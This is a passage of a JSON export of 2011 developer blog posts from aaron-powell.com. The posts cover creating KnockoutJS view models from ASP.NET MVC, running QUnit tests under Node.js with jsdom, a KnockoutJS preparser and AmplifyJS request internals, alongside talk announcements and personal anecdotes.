+0000", "tags": [ "knockoutjs", "javascript" ], "description": "", "content": "If you’ve been doing much work with KnockoutJS you’ll probably see examples where the code looks like this:\nvar todoViewModel = function() { this.items = new ko.observableArray(['Item 1', 'Item 2', 'Item 3']); this.selectedItem = new ko.observable('Item 1'); }; What I’m trying to point out here is that the viewModel is being defined in JavaScript and that the items within it are coded into your JavaScript.\nWhile you can argue that this is demo code and it should only be treated as such something I’ve noticed is there isn’t any other examples. I haven’t seen any example where they are talking about getting the data initially from the server for their viewModel.\nSo how do you approach this? In this article I’m going to look at how to create a viewModel from the server using ASP.Net MVC.\nNote: I’m talking about doing a viewModel as part of the initial page load since generally speaking you’ll have been doing data layer interaction as part of the request. Building a viewModel using an AJAX request is a different story and I wont be covering.\nFrom the server to the clientLet’s get started with an example of our controller:\npublic class TaskController : Controller { public ActionResult Index() { var vm = new TaskViewModel { Tasks = new[] { new Task("Write Blog Post"), new Task("Publish Blog Post") } }; return View(vm); } } I’m just going to have a reasonably simple ViewModel that just has a collection of tasks that I want to display as part of my KnockoutJS-built UI but the tasks are to be pulled in from my data layer (obviously this is demo code and it’s hard coded so you’ll have to use your imagination for that part :P).\nFor the view I’m just creating something that is very simple for the task list:\n<form data-bind="submit:addTask"> Add task: <input type="text" data-bind='value:taskToAdd, valueUpdate: "afterkeydown"' /> <button type="submit" data-bind="enable: taskToAdd().length > 0">Add</button> </form> <p>Your values:</p> <select multiple="multiple" height="5" data-bind="options:tasks"> </select> <div> <button data-bind="click: removeSelected, enable: hasTasks">Remove</button> <button data-bind="click: sortTasks, enable: hasTasks">Sort</button> </div> Now we have a conundrum, how do I as part of my response create a KnockoutJS ViewModel that I can then use in my UI?\nIt’s all about the serializationWhen I was prototyping this for my current project I remembers that Shannon has mentioned that he’d done something similar himself and I’ve shamelessly taken his approach and am using it :P.\nHis approach was to use a serializer to create a JSON object from the model (there was some other stuff in the skype message he sent me but I’ll confess to having not read that :P). For the serialization you can use the JavaScriptSerializer, the DataContractJsonSerializer or Json.NET. Personally I prefer Json.NET and it’s what I’ll be using in this demo.\nSo let’s make a little HTML helper to do this for us:\npublic static class HtmlHelperExtensions { public static IHtmlString KnockoutFrom<T>(this HtmlHelper<T> html, T obj) { var serializer = new JsonSerializer { ContractResolver = new CamelCasePropertyNamesContractResolver() }; return new HtmlString(JObject.FromObject(obj, serializer).ToString()); } } All we’re doing here is creating an instance of the JsonSerializer from Json.NET and telling it to use the CamelCasePropertyNamesContractResolver. This is why I like Json.NET, it allows me to convert my .NET naming conventions into JavaScript conventions without a lot of effort. Lastly we just return the serialized object. Not really anything special happening in here.\nNow in my View I can do this:\n@Html.KnockoutFrom(Model) Hmm but this isn’t really helpful, we’re just getting out JSON blob in our view, I still would have to do a bunch of work to actually make it usable and especially if I am doing this on a lot of pages it’s a lot of code that I’d prefer not to do every time. So let’s see if we can improve our extension method.\nSetting up the viewModelSo what do we want from our improved version? Well I’d like the observables to be set up for me and I’d like it to avoid global variables.\nTo do this what I’m going to do is update my extension method to use the Knockout Mapping plugin. This plugin is really sweet as it allows me to map a JSON object into a KnockoutJS object and is great when you’re working with AJAX data, you can easily pull down some data from the server and then use the plugin to extend it into your ViewModel.\nIn this case though I’m going to use it to map the JSON version of our server ViewModel into our KnockoutJS one:\npublic static IHtmlString KnockoutFrom<T>(this HtmlHelper<T> html, T obj) { var serializer = new JsonSerializer { ContractResolver = new CamelCasePropertyNamesContractResolver() }; var sb = new StringBuilder(); sb.Append("(function() {"); var json = JObject.FromObject(obj, serializer); sb.Append("var vm = ko.mapping.fromJS(" + json + ");"); sb.Append("ko.applyBindings(vm);"); sb.Append("})();"); return new HtmlString(sb.ToString()); } The main updates here are:\nI’m using a StringBuilder to build up some JavaScript (normally I hate server-generated JavaScript but here it serves a good purpose) I’m creating an immediately-invoked function expression to prevent leakage I’m doing my binding straight away, hiding the need for that too Excellent, this works, at least it works to an extent as we still have a few problems:\nWhat if I want to restrict where the binding happens? What about adding methods to my KnockoutJS viewModel? Improving interactivityWhile the above will work fine for simple scenarios it’s not great if you have a complex UI that you want to work with, and realistically it’s not likely you’ll have a viewModel you don’t want to extend with dependantObservables or anything, so let’s do some refactoring.\nI’m going to change the end of my extension method to look like this:\nsb.Append("var vm = ko.mapping.fromJS(" + json + ");"); var type = obj.GetType(); var ns = JavaScriptify(type.Namespace); sb.Append("namespace('" + ns + "');"); sb.Append(ns + "." + JavaScriptify(type.Name) + " = vm;"); sb.Append("})();"); return new HtmlString(sb.ToString()); What I’ve done here is instead of doing the bindings I’m just going to create a global object which the viewModel will be assigned to (but I am namespacing it so it’s a bit better). This object I can then interact with in my JavaScript and add methods/ properties/ etc to myself.\nI’m also using a helper method to make the .NET namespace & type names friendlier for JavaScript:\nprivate static string JavaScriptify(string s) { return string.Join(".", s.Split('.').Select(x => x[0].ToString().ToLower() + x.Substring(1, x.Length - 1))); } With this new extension method I can update my View to play around with the viewModel before binding:\n<script> @Html.KnockoutFrom(Model) $(function() { var model = knockout.serverViewModels.models.taskViewModel; model.addTask = function() {}; model.taskToAdd = new ko.observable(''); model.removeSelected = function() {}; model.hasTasks = function() {}; model.sortTasks = function() {}; ko.applyBindings(model); }); </script> ConclusionThis wraps up my post on how to convert your server ViewModel into something that can be used in your KnockoutJS, allowing you to push all data down in the initial request rather than subsequent ones.\nThanks to Shannon for the initial idea, hopefully this little extension will make it even easier.\nIf you want to grab the code it is available here.\nOne final note, the Json.NET serializer does support the DataMember attributes, so you can also selectively include properties from your server ViewModel by attributing them too.\n", "id": "2011-09-18-creating-vms-from-server" }, { "title": "So long and thanks for all the fish", "url": "https://www.aaron-powell.com/posts/2011-09-15-so-long-and-thanks-for-all-the-fish/", "date": "Thu, 15 Sep 2011 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "So it saddens me to say but as of today I will not be contributing to Umbraco, I have been stepped down from my contributor role on the project.\nI wish Shannon, Alex, Matt, Niels and the rest of the team the best for the Umbraco 5 release.\n", "id": "2011-09-15-so-long-and-thanks-for-all-the-fish" }, { "title": "Going beyond the browser with QUnit - Part 2", "url": "https://www.aaron-powell.com/posts/2011-09-05-qunit-beyond-the-browser-part-2/", "date": "Mon, 05 Sep 2011 00:00:00 +0000", "tags": [ "javascript", "nodejs", "qunit" ], "description": "Working with the DOM and QUnit from Node.js", "content": "In my last post I talked about what you need to do if you want to monitor changes and run tests automatically under Node.js but there was a few assumptions in there. One of the main assumptions I had was that you weren’t doing any DOM interactions.\nIn this part we’re going to look at how you can use DOM interactions in your QUnit tests and still run them under Node.js.\nWorking in a DOM-less JavaScript environmentOne thing that can trip people up when they first come to Node.js is they don’t realise that JavaScript isn’t tied to the browser. In reality JavaScript is just a language that happens to be used predominately in the browser, meaning that the window object isn’t part of the JavaScript specification, it’s just something that’s part of the runtime.\nSo when you’re running your code under Node.js you can’t just document.getElementById or $('#foo'). Uh-oh, how are we going to run tests against the DOM, after all if you want to test a library like Knockout.Unobtrusive you kind of need to be able to do that!\nWell don’t fear, the smart people in the Node.js community have solved this problem with a nice little package, jsdom!\njsdom is essentially an implementation of the DOM in Node.js allowing you do create a document object, a window object and interact with it as though it was in a browser.\nNote: There are limitations to jsdom, it doesn’t do everything you’d want but it’s a great way to do basic interactions such as we want to do in our tests.\nUpdating out test runnerIn my previous post I showed you how to set up a basic test runner in your Cakefile. For our tests we’re going to need to add some new stuff into our runtime (Node.js) and to do that we can use the dep option when we set up the runner:\ntest = deps: ["./tests/test-env.js"] code: "./#{output}/#{file}.js", tests: "./tests/#{file}.tests.js" What I’m going to do is create a test-env.js file which will be executed before the tests, allowing me to set up our pesudo-DOM.\nCreating our test environmentI’m going to set up a few new variables:\nvar jsdom = require('jsdom'), fs = require('fs'), dom = fs.readFileSync("./tests/knockout.unobtrusive.tests.html").toString(), document = jsdom.jsdom(dom, null, { features: { QuerySelector: true } }), window = document.createWindow(), navigator = { userAgent: 'node-js' }; First thing I’m doing here is importing jsdom and fs. This will mean I can work with jsdom and the file system.\nThe next step is to pull in our test HTML page as a string. We’ve got some base HTML which we’ll be interacting with during our tests. This is also the HTML we’d be running in our browser for our browser-based tests because keep in mind we want to share our tests between Node.js and the browser.\nNow that we have our DOM as a string we’ll create our document object from it. One other thing we are doing is specifying that we do want querySelector and querySelectorAll available, and this is done with the { features: { QuerySelector: true } } argument to jsdom.\nLastly we need to create a window object and a navigator object.\nSo when we have all these local variables we need to make sure that they’ll be available everywhere:\nglobal.window = window; global.navigator = navigator; global.document = window.document; Unlike the browser Node.js’s global object is called global, once we add our variables to that they’ll be available in any of the other files we use in the runner.\nAugmenting our testsIn the original set of tests that were in the Knockout.Unobtrusive project there was a heavy reliance on jQuery. Now admittedly there is a jQuery npm package but I couldn’t get it running on Node.js 0.4.10 but it’s not really important (I’d prefer not to rely on jQuery in my tests anyway).\nSo I’m going to do a check for jQuery (our Node.js tests wont have it):\nvar get, getAll, camalizer, data, dataMatcher = /data-(.+)/, dashAlphaMatcher = /-([a-z])/ig; if(typeof $ !== 'undefined') { getAll = get = $; } else { camalizer = function(x, letter) { return letter.toUpperCase(); }; data = function(el) { var attribute, attributes = el.attributes, data = {}; for(var i = 0, il = attributes.length; i < il; i++) { attribute = attributes[i]; if(dataMatcher.test(attribute.name)) { data[attribute.name.match(dataMatcher)[1].replace(dashAlphaMatcher, camalizer)] = attribute.value; } } return function(attr) { return data[attr]; }; }; get = function(id) { if(id.indexOf('#') === 0) { id = id.substring(1, id.length); } var el = document.getElementById(id); if(!el) { el = document.querySelectorAll(id)[0]; } el.data = data(el); return el; }; getAll = function(selector) { var el, elements = document.querySelectorAll(selector); if(elements[0] && !elements[0].dataset) { for(var i=0, il=elements.length; i < il; i++) { el = elements[i]; el.data = data(el); } } elements.each = function(fn) { var that = this; that.forEach(function(value, index) { fn.apply(that, [index, value]); }); }; return elements; }; Ok so the obvious first step is to check for jQuery and then we’re deferring everything to that, but instead of just exposing $ I’m going to expose two methods, get and getAll. The former will be useful for getting a single element, the latter for multiple elements.\nNext I’m creating two helper methods, the first being a camel case method (handy for working with data-* and the second simulating the .data API which you get from jQuery itself.\nNote: The data method isn’t exactly the same as using the $.data API, but I’m only replicating what I need at the current time.\nIn our simulated data API it will iterate through all the attributes and find any data-* ones (using a regex to look for them) then turning them into camel cased strings (like the spec, so data-foo-bar becomes fooBar). It’s probably a bit more complicated than it needs to be but it works nicely as I want.\nThe only other interesting point of note is that the getAll method will also simulate the .each API from jQuery so that we can use those loops in our tests.\nAnd there you go you’re essentially done. Once you replace all your usages of jQuery in your tests for the get and getAll API then you’ll be ready to roll!\nBe careful with DOM manipulationsSomething that I got tripped up with when porting the Knockout.Unobtrusive tests was that you don’t want your DOM manipulations to persist across the tests.\nIf you’ve done work with QUnit you’ll know that if you a DOM element with an id of qunit-fixture then it’ll get rebuilt after every single test.\nWell there’s a problem, the Node.js implementation of QUnit isn’t designed to work with the DOM so naturally this doesn’t work. But it’s an easy one to get around, QUnit exposes a method called reset that you can use to force a reset of the qunit-fixture element. Since the Node.js one doesn’t worry about the DOM it doesn’t have this method.\nTo implement this ourselves we’ll create a module for our test that we can have a teardown method on the end of it:\nQUnit.module('createBindings', { teardown: function() { if(!QUnit.reset) { //do the reset } } }); Note: you need to either access module via QUnit.module or assign that to module yourself because module is a reserved word in Node.js.\nFor the reset method I’ve created a helper function back in the test-env.js file:\nglobal.rebuildDom = function() { global.document = jsdom.jsdom(dom, null, { features: { QuerySelector: true } }); global.window = global.document.createWindow(); }; This will rebuild both the document and window objects from the original DOM string. So we can update our module like so:\nQUnit.module('createBindings', { teardown: function() { if(!QUnit.reset) { rebuildDom(); } } }); ConclusionI’m aware that this has been a bit of a long and complicated post but hopefully it gives you some starting points for how you could approach doing online & offline JavaScript tests.\n", "id": "2011-09-05-qunit-beyond-the-browser-part-2" }, { "title": "Slides from WEB203", "url": "https://www.aaron-powell.com/posts/2011-09-04-slides/", "date": "Sun, 04 Sep 2011 00:00:00 +0000", "tags": [ "auteched", "speaking", "teched-au-2011" ], "description": "", "content": "I recently spoke at Teched AU in a session called Chasing the Evolving Web.\nHere’s the assets from the talk:\nSlides Recording And here’s a list of the tools which I looked at in my presentation:\nHTML5 Boilerplate\nModernizr\nYepNope.js\nRaphaelJS\nAmplifyJS\nKnockout\n", "id": "2011-09-04-slides" }, { "title": "Going beyond the browser with QUnit - Part 1", "url": "https://www.aaron-powell.com/posts/2011-09-03-qunit-beyond-the-browser-part-1/", "date": "Sat, 03 Sep 2011 00:00:00 +0000", "tags": [ "javascript", "nodejs", "qunit" ], "description": "Taking your QUnit tests out of the browser to use your tests with Node.js", "content": "When it comes to unit testing my JavaScript my preferred framework is QUnit. If you’re not familiar with QUnit it’s the test framework for jQuery so I think it’s reasonably well up to the task of testing JavaScript.\nRecently I wrote an article on a preparser I’ve written for Knockout. Interestingly enough at the same time Brendan Satrom had the same idea. I quite like the approach that Brendan has taken so I decided to have a poke around in the code and see if we could even merge the two projects.\nThe first thing I noticed when looking into the code was that it was written using CoffeeScript. The second thing I noticed was that the tests were all written using QUnit and were to be run in the browser. But there was a bit of a nuisance, the tests were against the compiles JavaScript, not the raw CoffeeScript (it was running against the generated file), to do any modifications, and test them, you have to copy the CoffeeScript to the online compiler, the back to the compiled file and then run the tests.\nI’m sure you can see where the problems can come into this solution.\nWell I’ve done a few small projects using CoffeeScript in the past and I’ve also included some tests into it so I decided at having a crack at getting this to work.\nGetting your tools togetherSo to get started I’m using Windows and I’m going to be using Node.js to do the browser-less coding. Although I’m aware there is a version of Node.js for Windows I’m still using a self-compiled version with cygwin because npm works fine under cygwin but not with the Windows compiled version.\nAdditionally I’m going to be using a few npm packages:\nCoffeeScript QUnit Colors Getting started by watching cakeIf you’ve done much work with CoffeeScript you’ll probably have come across the concept of a Cakefile, if you haven’t, a Cakefile is a CoffeeScript version of a Rakefile (or MSBuild is a similar concept if you’re coming from .NET just a lot more horrible), so I’m going to start off by using Cake to create a file system watcher.\nThe basic idea if I want to have a Cake task which will monitor for changes on the file system (specifically our CoffeeScript file) and when a change happens we’ll compile it to JavaScript and run our tests.\nFirst off I’ll define some constants in our Cakefile:\nfs = require 'fs' path = require 'path' CoffeeScript = require 'coffee-script' file = 'knockout.unobtrusive' source = 'coffee' output = 'js' Next it’s time to setup our watch task:\ntask 'watch', 'Watch prod source files and build changes', -> msg = "Watching for changes in #{source}" console.log msg fs.watchFile "#{source}/#{file}.coffee", (curr, prev) -> if +curr.mtime isnt +prev.mtime console.log "Saw change in #{source}/#{file}.coffee" try invoke 'build' console.log 'build complete' invoke 'tests' catch e msg = 'Error with CoffeeScript build' console.log msg console.log e We’re using the standard watchFile method in Node and in the callback we’ll ensure that the change times aren’t equal (double-checking for false positives) and if there’s a valid change we want to execute the following two tasks:\nbuild tests Additionally we’re wrapping this in a try/ catch so that if it fails we can provide a useful message but have the watcher keep running (say if you save while you’re half-way through a change you wont get a major failure or anything).\nNow let’s have a look at the build task. This task will allow us to compile our coffee file into JavaScript. This is just going to be a standard Cake task as well so you can use it elsewhere if you want:\ntask 'build', "builds #{file}", -> console.log "building #{file} from coffeescript" code = fs.readFileSync "#{source}/#{file}.coffee", 'utf8' fs.writeFile "#{output}/#{file}.js", CoffeeScript.compile code Since Node (well JavaScript) is a callback-based programming model generally speaking you’ll be doing asynchronous operations, even with the file system. Node has provided some changes though to allow for synchronous programming. In this case I’m going to be using the synchronous read operation. The main reason for this is so that I don’t have to pass around a callback which will then do the tests (this could get messy in the Cakefile).\nOnce the read operation is completed we pipe the output into the CofeeScript compiler API (which we can call from CoffeeScript/ JavaScript) and write the output of that into a JavaScript file.\nWhen the build task is done the next step in our watcher is to call out to our test runner. As mentioned above I wanted to reuse the QUnit tests that already shipped in source of Knockout.Unobtrusive I plan to use the Node.js implementation of QUnit. It’s rather simple and again we’ll create a Cake task:\ntask 'tests', "run tests for #{file}", -> console.log 'Time for some tests! ' runner = require 'qunit' sys = require 'sys' colors = require 'colors' test = code: "./#{output}/#{file}.js", tests: "./tests/#{file}.tests.js" runner.options.summary = false report = (r) -> if r.errors msg = "Uh oh, there were errors" sys.puts msg.bold.red else msg = 'All test pass' sys.puts msg.green runner.run test, report So a few things of note:\nWe’re using the runner which comes with QUnit for Node.js We’re creating an object with our tests info which includes: The file under test The tests to execute I’m suppressing the summary (we execute the tests a lot so there’s no need to see it) Lastly there’s a callback for when the runner finishes which will either dump a message on success or failure (with a pretty colour!) From the point of view of the Cakefile that’s really all we have a need for, we’ve got our watcher up and running and we can just kick it off:\ncake watch Now whenever we edit our CoffeeScript file it’ll go nicely.\nWrapping upSo this wraps up the first part of migrating our tests out of the browser to make a more automated series of JavaScript tests.\nNext time we’ll look at how to deal with some of the limitations of working in a DOM-less environment.\n", "id": "2011-09-03-qunit-beyond-the-browser-part-1" }, { "title": "Slides from WUX202", "url": "https://www.aaron-powell.com/posts/2011-09-03-slides/", "date": "Sat, 03 Sep 2011 00:00:00 +0000", "tags": [ "tenz", "speaking", "teched-nz-2011" ], "description": "", "content": "I recently spoke at Teched NZ in a session called Chasing the Evolving Web.\nHere’s the slides from the talk:\nSlides And here’s a list of the tools which I looked at in my presentation:\nHTML5 Boilerplate\nModernizr\nYepNope.js\nRaphaelJS\nEaselJS\nAmplifyJS\nKnockout\nBackbone\n", "id": "2011-09-03-slides" }, { "title": "Introducing the KnockoutJS preparser", "url": "https://www.aaron-powell.com/posts/2011-08-09-knockoutjs-preparser/", "date": "Tue, 09 Aug 2011 00:00:00 +0000", "tags": [ "javascript", "knockoutjs" ], "description": "", "content": "In my previous post I outlined one of the biggest issues I have with KnockoutJS as being its WPF/ Silverlight binding syntax and how it requires you to put JavaScript into your HTML.\nNow I’m a pretty firm believe that if you are going to criticise something then you better make it constructive. Just saying “I don’t like blah” isn’t helpful to a) the author of blah or b) people wanting to learn more about blah, so I decided that I would follow up my criticism of KnockoutJS with a way I would go about fixing it.\nIntroducing the KnockoutJS preparserTo address my issue with KnockoutJS use of JavaScript in HTML I started looking at how I would go about it and the solution I kept coming back to was using the data-* attributes to describe in my HTML an intention. I decided that if I could do this in a good, convention approach then I should be able to translate it back into a KnockoutJS binding with minimal impact.\nOut of this idea (and a challenge from my colleague Ducas) I set about taking my idea from my brain and putting in code.\nEssentially what I came up with was taking this:\n<span data-ko-text="firstName"></span> And turning it into this:\n<span data-bind="text: firstName"></span> The idea is that you take data-ko-* as a prefix and use that to describe what could (well will…) become your binding syntax. Once getting this done I threw the code up on github and you can grab it from the KnockoutJS Pre-Parser project page.\nWhat does it addressThe ultimate goal is to be able to use the data-ko-* to describe out what you want in your HTML and the pre-parser will pick that up and Knockout-ify it for you. Ideally I’d like to support all common scenarios and so far I support:\nBasic bindings with text, css, value, etc Template name binding Pre-parser syntax within a template Template options (but not completely, you still have to embed JSON in your template options attribute. I added it about 3 hours ago so it’s still being worked on :P) Event handler wire ups (if you want a complex handler like defining scope, etc you’ll still have to embed JavaScript for now, I’m trying to work out how to get around that) How to use itIf you really want to know how to use it I suggest you read the Readme or the tests but the quick and dirty is:\nInclude it after you include KnockoutJS ??? Profit The pre-parser will actually hijack the ko.applyBinding method and perform the pre-parsing at that point, no custom stuff needs to be done to make it work :).\nWhere to get itAt the moment the only way to get it is via Github, depending on interest/ motivation I’ll put it up on Nuget for people to get it via as well.\nConclusionSo this wraps up my introduction to the KnockoutJS Pre-parser and an approach I am taking to address one of the issues which I have with KnockoutJS. Feel free to give me any feedback you have on the library and the idea in general.\n", "id": "2011-08-09-knockoutjs-preparser" }, { "title": "JavaScript: A story", "url": "https://www.aaron-powell.com/posts/2011-08-09-a-story/", "date": "Tue, 09 Aug 2011 00:00:00 +0000", "tags": [ "javascript", "random" ], "description": "", "content": "Everyone use to notice the old war veteran that sat on the corner. His uniform was tatty and he’s always be spouting about his heyday with lines like “Don’t you remember my role in the first browser war” and “If it wasn’t for me VBScript would be the language of choice of the browser!”. We’d look at him with pity, throw a few dollars his way and carry on with our day but never really got to know him. People who weren’t from around here would come by occasionally and notice our friend and look on bemused, wondering why we put up with him.\nAs the years went by we’d still see him sitting on his corner, but gradually he was looking less dishevelled. We still threw him money and chuckled to ourselves when he’d say “You’re not the only one who does this, everyone listens to me, I’m the most popular out there”. I mean who could really take the guy seriously? We’d put up with him for years now, we knew some of his quirks but we never really paid him the time of day unless we wanted to get lost in pain and suffering.\nThen one day he was gone; there was no dishevelled old man sitting on our corner in tatty military gear. We felt sad, had our old friend passed away at the end of the first decade in the 21st century? Should we have paid more attention to him; maybe actually loved him? In reflection maybe he wasn’t so crazy; maybe he did have a point; maybe there really was a time when his uniform sparkled and we’d have looked at him with awe.\nBut then we noticed someone looking at us. We turned to see a proud looking man in a shiny new military uniform and as we looked longer we noticed that it wasn’t some stranger looking at us but it was our old friend JavaScript. He was now sober, he’d been given a shave, a shiny new uniform and an array of new armaments. But what was most important was that he was looking for action.\nHe saw us looking back at him, he smiled and shouted “I’m ready for round two, let’s get this browser war started”.\nAnd with a quiet dignity he wandered off to help us fight the next generation of wars.\n", "id": "2011-08-09-a-story" }, { "title": "Are you going to Teched Australia?", "url": "https://www.aaron-powell.com/posts/2011-08-08-teched-au-2011/", "date": "Mon, 08 Aug 2011 00:00:00 +0000", "tags": [ "speaking", "techedau" ], "description": "", "content": "Because if you are you get to see me not once but twice! Woot!\nCome down and check out WEB203 - Chasing the Evolving Web and learn how to keep ahead of the game when it comes to doing the latest and greatest on the web.\nIn addition you should come to DEV305 - An MMO in 45 Minutes: Developing for 2 screens and a cloud without being cut for some utter bedlam with myself, Luke Drumm, Richard Banks and Steve Nagy.\nSee you there!\n", "id": "2011-08-08-teched-au-2011" }, { "title": "Are you going to Teched NZ?", "url": "https://www.aaron-powell.com/posts/2011-08-08-teched-nz-2011/", "date": "Mon, 08 Aug 2011 00:00:00 +0000", "tags": [ "speaking", "tenz", "umbraco" ], "description": "", "content": "Because if you are you can see me not once, not twice, but three time, and really, who wouldn’t want to see me that much :P.\nCome down to COS204 - Umbraco and Azure to learn about how awesome Umbraco is and how it really does love Azure.\nOr if web is more your thing jump on over to WUX202 - Chasing the Evolving Web to learn about being a modern web developer and WUX203 - JavaScript Pitfalls for the .NET Developer to learn about common problems encountered when doing JavaScript development and how to avoid them.\nSee you in Auckland!\n", "id": "2011-08-08-teched-nz-2011" }, { "title": "Why I don't like KnockoutJS", "url": "https://www.aaron-powell.com/posts/2011-08-08-why-i-don-t-like-knockoutjs/", "date": "Mon, 08 Aug 2011 00:00:00 +0000", "tags": [ "javascript", "knockoutjs", "rant" ], "description": "", "content": "A few times I’ve ruffled a few features by making the statement that I am not a fan of KnockoutJS.\nLet me start by clarifying a few things:\nI think the concept of KnockoutJS is a good one It’s nothing against Steve Sanderson, to have come up with it in the first place is impressive This is my opinion and I will still recommend that others try it and form their own opinions. Ok so on to backing up my statement and let me start by showing you why I am not a fan:\n<button data-bind="click: registerClick, enable: !hasClickedTooManyTimes()">Click me</button> Can’t see it? I’ll remove some of the ‘guff’:\ndata-bind="click: registerClick, enable: !hasClickedTooManyTimes()" Right there, the data-bind="..." is what I don’t like, the fact that I’m embedding potentially large amounts of JavaScript in my HTML.\nSo ultimately what it comes down to is that I have an issue with the binding syntax that is used with KnockoutJS. Now I (think) understand why it is like this, KnockoutJS has a lot of relationships with the WPF/ Sliverlight binding idea (and MVVM obviously) so it makes sense to people coming from those backgrounds. Me, I’m not a WPF/ Silverlight developer, never have been (I did try my hand at WPF but just didn’t get very far…).\nWhy does it bother me? You may be asking yourself that if the problem I have is with the syntax and not concept then where’s the real issue, heck it’s only a small part of it.\nAnd this is where it gets into the “don’t take my word, use it yourself” part of the post. I’m a web purest and I believe there should be a strict separation between your UI and your functionality, even in the client aspect. This means that your HTML file should only contain HTML and your JavaScript file is where the client ‘brain’ resides.\nHaving been around ASP.Net for a while (and particularly Web Forms) the idea of obtrusive JavaScript is something that you grow up with. You’re use to seeing in-line event handlers, JavaScript tacked at the bottom of the page, etc. This is a smell, your HTML file is no longer responsible for what HTML is, a mark-up language, it’s starting to try and become self aware, to intrinsically know that when I click a button some JavaScript has to be fired, that kind of stuff.\nThis is smarts that I don’t want my HTML to have.\nIn the web we’ve also seen a shift on this in recent years away from have JavaScript in HTML, and even within Microsoft we’ve seen them acknowledge this with the jQuery unobtrusive validation plugin which was released with MVC3.\nThe shift has seen us using HTML to describe the intention. Using the jQuery unobtrusive validation as an example we use the data-validate-* attributes to describe our validation rules, and then we use JavaScript to convey those rules into a functional concept.\nThis results in a clean separation between HTML and JavaScript with HTML going back to just describing intention and JavaScript taking those intentions and running with it.\nConclusion This post has basically outlined my primary grievance with KnockoutJS. As stated, I don’t have a problem with the concept of it, the idea of two-way binding is quite nice but what’s required to achieve that is where the issue lies.\n", "id": "2011-08-08-why-i-don-t-like-knockoutjs" }, { "title": "Having fun and digging deep into amplifyjs and the request API", "url": "https://www.aaron-powell.com/posts/2011-07-12-fun-in-amplifyjs-request/", "date": "Tue, 12 Jul 2011 00:00:00 +0000", "tags": [ "javascript", "amplifyjs", "doing-it-wrong" ], "description": "Let's have a bit of a fun doing something that's probably a bad idea with the AmplifyJS Request API.", "content": "Have you played with amplifyjs yet? Played with it’s cool way of handling requests?\nI really like the way you can do this:\n//in our JavaScript bootstrapper amplify.request.define("searchTwitter", "ajax", { url: "http://search.twitter.com/search.json?callback=?", dataType: "jsonp", cache: 30000 }); //in some other file amplify.request('searchTwitter', { q: 'amplifyjs' }, function (data) { //handle returned data }); It’s nice and clean a way to setup request pointers which you can then mock out for testing purposes.\nBut you know, it’s not as clean as I’d really like and if you know me you’ll know that I like to try and do something with an API that you’re not meant to do. So while playing with amplify I decided to dive into the code and work at how it was mapping my defined requests to the method call and doing so I found something interesting (and well… fun!):\namplify.request.resources.searchTwitter({ data: { q: 'amplifyjs' }, success: function(data) { //handle returned data } }, {}); Yep that’s right, the request function has a public property called resources, which has properties added to it that represent the requests which have been defined.\nIf you’re using an ajax request (as I defined at the start) you have two arguments to pass in:\nThe settings object, most of which are passed to $.ajax. In this case I’m passing in the data object and a success callback, a bit more explicitly obviously I haven’t quite worked out what the 2nd parameter is for other than passing in an abort handler in (but it does seem to be overridden at the end of the function anyway…) Whether or not the knowledge that you can do this is kind of any use I don’t know, I just think it’s kind of cool :P.\nSome points of note The arguments of your method hanging off resources will depend on the type of request. Amplifyjs has build in request types and supports custom types, so the arguments may be different, eg:\namplify.request.types.foo = function() { return function(callback) { console.log('aww you want to foo!'); if(callback) { callback.call(this); } }; }; amplify.request.define('bar', 'foo', {}); amplify.request.resources.bar(function() { //just a function as an argument console.log('hey, it works!'); }); This isn’t a documented feature so it works on my machine and may not work ever again I offer no warranty on this code Custom request types must return a function (in fact any request types have to return a function) It’s your choice as to whether a TypeError is better than the built in error handling This was really just a thought experiment to push an API to its limit Happy Hacking!\n", "id": "2011-07-12-fun-in-amplifyjs-request" }, { "title": "JavaScript Quiz", "url": "https://www.aaron-powell.com/posts/2011-07-10-javascript-quiz/", "date": "Sun, 10 Jul 2011 00:00:00 +0000", "tags": [ "javascript" ], "description": "", "content": "Today I released a little website, http://javascriptquiz.com, which was inspired by http://cssquiz.com.\nBasically it’s a site which I’ll put out JavaScript questions for people to tackle. If you have any ideas for questions which you’d like to see put out to the community feel free to drop me an email (I’m sure if you’re cluey you can find it on this site :P).\n", "id": "2011-07-10-javascript-quiz" }, { "title": "My geek origin", "url": "https://www.aaron-powell.com/posts/2011-07-06-geek-origin/", "date": "Wed, 06 Jul 2011 00:00:00 +0000", "tags": [ "random", "about" ], "description": "In the beginning there was...", "content": "In the spirits of things you never needed to know about me I decided to share my Geek Origin story with the world.\nWhen I was in late primary school (or maybe early high school, I’m not really sure, at this old age my mind is starting to go) I asked my parents to enroll me in a holiday program which involved playing with Lego and electronics.\nThis was back in the mid-90’s so having access to a fully decked out Lego kit and PC connector wasn’t exactly the norm (wait, am I saying it now is :P) so having the opportunity to spend a whole lot of time just playing with it seemed like the most awesome idea in the world.\nSo off I trotted to my holiday program where I was joined by a number of other kids my age and an instructor who gave us great piles of Lego, some command boards and showed us the basics of connecting it on the computer. We had some basic scenarios which we were to work through that involved making a merry-go-round that would stop after a period of time (and some others) but there was an more exciting prize on the horizon, if we finished early we got to have free time to do what we wanted.\nNow I’d always been someone who had to know how it worked. My dad would bring old telephones home from work and give me a screw driver and let me go to town with tinkering (and more than one electrical shock). I successfully destroyed more than one old radio that I found on council pickup day by trying to figure out where all the wires were going. So when the promise of doing what I wanted with these strange combination of statements on a computer and a pile of Lego it was ON.\nAfter completing the basic tasks I set about changing the parameters. What if I change this number? Oh look it gets a lot faster, and if I combine it with a change to the looping statement I can make it go round one way a few times then reverse itself. We dubbed our creation the merry-go-round of death (c’mon, we were like 10 :P)!\nThe power was intoxicating…\nBut then the thrill started to die down, there’s only so much I can do with this merry-go-round, so I started looking for the next big thing.\nOutside the window of the community centre was an intersection, an intersection with traffic lights. So I sat there watching them and I knew what I had to do, I had to replicate them in Lego.\nI broke down my current creation, put together a basic Lego intersection and opened up a new command editor and got cracking. Before I knew it I had lights going on and off, all perfectly in sync with the lights outside our window. I marveled in the control I had over my own little intersection.\nWhen the day was done we got to print out our little programs (on a dot matrix printer mind you!) which I proudly showed my parents, who gave me the blank stare that these days I’m all to use to seeing :P.\nAnd this concludes my trip down memory lane to back where I fell in love with the power over computers programming has given me.\n", "id": "2011-07-06-geek-origin" }, { "title": "Introducing Postman - A JavaScript Messaging Library", "url": "https://www.aaron-powell.com/posts/2011-07-02-postman/", "date": "Sat, 02 Jul 2011 00:00:00 +0000", "tags": [ "javascript", "postman", "coffeescript" ], "description": "", "content": "PreludeBack in May I presented at DDD Melbourne on JavaScript design patterns. One of the patterns that I was talking about was the idea of pub/ 